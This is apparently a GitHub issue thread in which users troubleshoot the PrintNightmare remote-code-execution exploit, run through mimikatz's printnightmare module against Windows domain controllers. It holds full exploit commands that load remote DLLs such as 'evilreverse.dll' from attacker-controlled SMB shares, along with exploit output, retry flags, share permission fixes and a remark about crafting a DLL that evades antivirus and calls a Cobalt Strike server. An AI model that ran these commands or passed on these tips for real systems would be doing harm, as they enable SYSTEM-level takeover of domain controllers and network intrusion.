sujit
commented
3 years ago Target OS: Windows Server 2016 Datacenter (Domain Controller)
Open sujit opened 3 years ago
sujit
commented
3 years ago Target OS: Windows Server 2016 Datacenter (Domain Controller)
7MinSec
commented
3 years ago Hi @sujit , I've only played with this recently so I'm certainly no expert. However, I found the same behavior you described when my DLL payload was getting eaten by AV. I finally crafted one that did evade AV, and when that happens, the last line of output says:
ConfigFile: c:\some\path\name-of-your-DLL.dll - OK!And then I found that my DLL executed and called home to my Cobalt Strike server.
haim-n
commented
3 years ago I'm getting the same CallAddPrinterDriverEx error, against both 2016 and 2019 DCs, with both having their AV disabled.
Would love to hear if anyone has some insights or suggestions.
Thanks!
Ug0Security
commented
3 years ago can you confirm that the serv can reach the share without credentials ?
sujit
commented
3 years ago FYI, I am able to access the anonymous share records from the DC box without any authentications in-place. However, this time I see another error, but pretty much similar (error code value changed this time) though:
Just curious, if at all someone has the PCAP (when the exploit actually worked), would anyone mind sharing the same? That could help me understand what might be going wrong under the hood.
mimikatz # misc::printnightmare /server:172.16.1.254 /library:\\172.16.1.15\smb\evilreverse.dll
| Remote : 172.16.1.254
* KernelBase: C:\Windows\System32\kernelbase.dll
* DriverPath: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\unidrv.dll
| DataFile : \\172.16.1.15\smb\evilreverse.dll (evilreverse.dll)
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\2\evilreverse.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 3
mimikatz #@Ug0Security ^^^
Sh0ckFR
commented
3 years ago I have the same issue on a Windows 10 without AV in a VM, I checked the code a bit, and I think 1 condition here is probably the issue (the share folder is available without credentials):
Btw I like spaghetti :p
gentilkiwi
commented
3 years ago the share folder is available without credentials
If you have this in your capture (between AddPrinterDriverEx request and response), this is because of a not anonymous accessible remote share
+, the "poc" is for fresh system without previous attempt, you can have better result by adding /try:50 by eg.
Example with previous attempt(s) of another POC
.#####. mimikatz 2.2.0 (x64) #19041 Jul 1 2021 03:17:37
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # misc::printnightmare /server:dc.lab.local /library:\\hack.lab.local\security\mimilib.dll /try:10
| Remote : dc.lab.local
* KernelBase: C:\Windows\System32\kernelbase.dll
* DriverPath: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_2097e02ea77b432e\Amd64\unidrv.dll
| DataFile : \\hack.lab.local\security\mimilib.dll (mimilib.dll)
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\2\mimilib.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 2
| Trying : 3 to 10
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\3\mimilib.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 2
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\4\mimilib.dll - OK!
mimikatz(commandline) # exit
Bye!
rezasarvani
commented
3 years ago Having the same problem with anonymous accessible share and vulnerable DC
muxueo
commented
2 years ago Have you solved this problem
citronneur
commented
2 years ago I think https://github.com/cube0x0/CVE-2021-1675/pull/25 can solve the issue. Soletimes backup folder is cleanup properly, using this solution we can perform rce without bruteforcing the backup folder. It’s more stable.
haibara3839
commented
2 years ago can you tell me where is calc.dll? how to make the calc.dll?
hitem
commented
2 years ago So, i had this issue and have been trying to solve it for a few days. Im now able to reproduce the issue and consistently repair it. I dont know what causes this. However, every time i create a folder and share it, the ICACLS of it is not 100% identical to the one that originally worked. So by exporting ICACLS and comparing and then restoring the functional one to every other directory i tried, it works.
If it helps anyone else, feel free to try:
2 D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;OICIIOID;SDGXGWGR;;;AU)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)(A;OICIID;0x1200a9;;;BU) 2\mimidrv.sys D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU) 2\mimikatz.exe D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU) 2\mimilib.dll D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU) 2\mimispool.dll D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
To restore it, go one step up in folder structure from \2\ and run: (in my case C:\SEC\2 would be C:\SEC) icacls C:\SEC /restore C:\SEC\rightsbackup.txt /t /c
While trying to reproduce the
printnightmarebug, I am coming across with an error condition. As per the wireshark packet traces, for theAddPrinterDriverExDCERPC call I don't see any potential error (screenshot attached below) though.Any idea, if I missing something here?
mimikatz exec:
Wireshark: